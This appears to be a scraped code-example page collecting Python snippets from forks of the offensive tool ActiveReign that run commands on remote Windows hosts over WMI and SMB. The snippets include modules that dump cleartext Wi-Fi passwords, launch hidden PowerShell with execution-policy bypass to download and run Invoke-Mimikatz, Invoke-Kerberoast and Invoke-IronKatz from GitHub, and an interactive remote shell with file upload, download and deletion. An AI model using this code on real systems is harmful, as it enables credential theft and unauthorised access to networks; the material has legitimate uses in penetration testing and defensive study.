Python SMBEXEC Examples

Example #1

    def cmd_execution(self, cmd):
        self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(self.host, self.smbcon.ip, self.username, cmd))
        if self.exec_method == 'wmiexec':
            self.executioner = WMIEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)

        elif self.exec_method == 'smbexec':
            self.executioner = SMBEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)

        self.output = self.executioner.execute(cmd).splitlines()

Example #2

File: wifi_passwords.py Project: rajivraj/ActiveReign

    def run(self, target, args, smb_con, loggers):
        profiles = []
        logger = loggers['console']

        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            # Quick n dirty error checking...
            results = executioner.execute(
                'netsh wlan show profiles').splitlines()
            if len(results) <= 1:
                logger.fail([
                    smb_con.host, smb_con.ip,
                    self.name.upper(), "{}: {}".format(self.name, results[0])
                ])
                return

            # List all profiles
            for r in results:
                if r.strip().startswith('All User Profile'):
                    try:
                        wifi = r.strip().split(":")[1]
                        profiles.append(wifi.lstrip().rstrip())
                    except:
                        pass

            # Get clear text passwords
            for p in profiles:
                try:
                    for result in executioner.execute(
                            'netsh wlan show profile name=\"{}\" key=clear'.
                            format(p)).splitlines():
                        if result.split(":")[0].strip() in [
                                'SSID name', 'Authentication', 'Cipher',
                                'Key Content'
                        ]:
                            logger.success([
                                smb_con.host, smb_con.ip,
                                self.name.upper(),
                                result.lstrip()
                            ])
                except Exception as e:
                    logger.debug([
                        smb_con.host, smb_con.ip,
                        self.name.upper(), "{}: {}".format(self.name, str(e))
                    ])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Example #3

File: invoke_kerberoast.py Project: wizard2773/ActiveReign

    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        # Again super lazy way of powershell execution need to redo
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1\');Invoke-kerberoast -OutputFormat Hashcat"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Example #4

def code_execution(con, args, target, loggers, config_obj, cmd=None, return_data=False):
    # Used as the primary execution function for ps_execute and all modules.

    # Get payload to execute
    if cmd != None:
        payload = cmd
    else:
        payload = args.execute

    # Implement Execution Method
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)

    # Log action to file
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))

    # Spawn thread for code execution timeout
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout+5)

    # CMD Output
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    # Return to module not print
    if return_data:
        return timer.result

    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])

Example #5

def code_execution(con, args, target, loggers, config_obj):
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)

    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
        target, args.domain, args.user, args.execute))
    timer = ExecutionTimeout(executioner, args.execute)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 3)  # Account for sleep timer in exec class

    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
            con.host, args.user, args.execute, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])

Example #6

    def run(self, target, args, smb_con, loggers):
        logger = loggers['console']
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell -exec bypass -noni -nop -W hidden -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\');"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Example #7

    def run(self, target, args, smb_con, loggers):
        logger = loggers['console']
        # Again super lazy way of powershell execution need to redo
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1\');"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

Example #8

File: host_enum.py Project: heildampf/ActiveReign

def code_execution(con,
                   args,
                   target,
                   loggers,
                   config_obj,
                   payload,
                   return_data=False):
    # Implement Execution Method
    if args.exec_method.lower() == 'wmiexec':
        executioner = WMIEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'smbexec':
        executioner = SMBEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'atexec':
        executioner = TSCHEXEC(loggers['console'],
                               target,
                               args,
                               con,
                               share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'winrm':
        executioner = WINRM(loggers['console'],
                            target,
                            args,
                            con,
                            share_name=False)
    elif args.exec_method.lower() == 'ssh':
        executioner = con
    # Log action to file
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
        target, args.domain, args.user, payload))

    # Spawn thread for code execution timeout
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 5)
    exe_thread.running = False

    # CMD Output
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
            con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    # Return to module not print
    if return_data:
        return timer.result

    for line in timer.result.splitlines():
        loggers['console'].info(
            [con.host, con.ip,
             args.exec_method.upper(), line])

Example #9

class AR3Shell(Connector):
    def __init__(self, args, db_obj, loggers):
        Connector.__init__(self, args, loggers, args.target)
        self.output     = []
        self.pwd_list   = ['C:', 'Windows', 'System32']
        self.pwd        = '\\'.join(self.pwd_list)

        self.exec_method  = args.exec_method
        self.sharename    = args.fileless_sharename
        self.db           = db_obj

        try:
            # Setup Smb Connection
            self.logger.status('Initiating remote connection')
            self.smbcon = SmbCon(self.args, loggers, self.host, self.db)
            self.smbcon.create_smb_con()

            # Execute command to verify permissions
            self.cmd_execution('ECHO %USERDOMAIN%\%USERNAME%')
            self.logger.success('Starting emulated shell (Host: {}) (User: {}) (Method: {}) (Fileless: {})'.format(self.host, self.output[0].strip(), self.exec_method, str(args.fileless)))
            self.logger.warning("This is a limited shell and requires full paths for file interactions\n")

        except Exception as e:
            self.logger.fail("Error Starting Shell:".format(str(e)))
            exit(1)

    def help(self):
        print("""
          help                                    - show this menu
          exit                                    - Close shell
        
        Navigation:
          pwd                                   - Show PWD
          dir                                   - List PWD
          cd                                    - Change directory
          
        File Interactions:
          type [remote_file]                    - Show file contents    (Full Path Required)
          download [remote_file] [location]     - Download remote file  (Full Path Required)
          upload [local_file] [location]        - Upload local file     (Full Path Required)
          delete [remote_file]                  - Delete remote file    (Full Path Required)
          
        Commands:
          [cmd]                                 - Execute remote cmd
        """)

    def cd(self, cmd):
        if cmd.startswith('cd'):
            try:
                cd_path = cmd.split(' ')[1]
                cd_split = cd_path.replace("\\", "/").split("/") # Input formatting
                cd_split = [x for x in cd_split if x]            # Remove blanks

                if cd_path == "/" or cd_path == "\\":
                    self.pwd_list = ['C:']

                # Dir up
                elif cd_split[0] == "..":
                    self.pwd_list.pop(-1)
                    cd_split.pop(cd_split.index(".."))

                # new dir
                elif cd_path.startswith(("/", "\\")):
                    self.pwd_list = ['C:']

                self.pwd_list = self.pwd_list + cd_split

            except:
                self.logger.FAIL('Unable to change directories')

    def dir(self, cmd):
        if cmd == "dir":
            return self.cmd_execution("dir {}".format(self.pwd))
        else:
            return self.cmd_execution(cmd)

    def download(self, cmd):
        try:
            val = cmd.split(" ")
            self.smbcon.downloadFile(val[1], val[2])
            self.logger.success("Download Complete: {}".format(val[2]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Download Failed: {}".format(str(e)))

    def upload(self, cmd):
        try:
            val = cmd.split(" ")
            self.smbcon.uploadFile(val[1], val[2])
            self.logger.success("Upload Complete: {}".format(val[2]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Upload Failed: {}".format(str(e)))

    def delete(self, cmd):
        try:
            val = cmd.split(" ")
            self.smbcon.deleteFile(val[1])
            self.logger.success("Download Complete: {}".format(val[1]))
        except Exception as e:
            if str(e) == "list index out of range":
                self.logger.fail('Not enough values to unpack, see -h for more')
            else:
                self.logger.fail("Deletion Failed: {}".format(str(e)))

    def cmd_execution(self, cmd):
        self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(self.host, self.smbcon.ip, self.username, cmd))
        if self.exec_method == 'wmiexec':
            self.executioner = WMIEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)

        elif self.exec_method == 'smbexec':
            self.executioner = SMBEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)

        self.output = self.executioner.execute(cmd).splitlines()

    def cmdloop(self):
        while True:
            try:
                # init prompt
                self.output = []
                self.pwd = '\\'.join(self.pwd_list)
                cmd = input("{}> ".format(self.pwd))
                cmd = cmd.lstrip().rstrip()

                self.logger.debug("User cmd ::: \'{}\'".format(cmd))

                # Handle CMD input
                if cmd == "help":
                    self.help()

                elif cmd == 'exit':
                    try:
                        self.smbcon.close()
                    except:
                        pass
                    return True

                elif cmd.startswith('cd'):
                    self.cd(cmd)

                elif cmd.startswith('dir'):
                    self.dir(cmd)

                elif cmd.startswith('download'):
                    self.download(cmd)

                elif cmd.startswith('upload'):
                    self.upload(cmd)

                elif cmd.startswith('delete'):
                    self.delete(cmd)

                elif cmd == 'pwd':
                    self.logger.output(self.pwd)

                else:
                    self.cmd_execution(cmd)

                # Show cmd Output
                for result in self.output:
                    self.logger.output(result)

            except KeyboardInterrupt:
                try:
                    self.smbcon.close()
                except:
                    pass
                return True
            except Exception as e:
                self.logger.debug(str(e))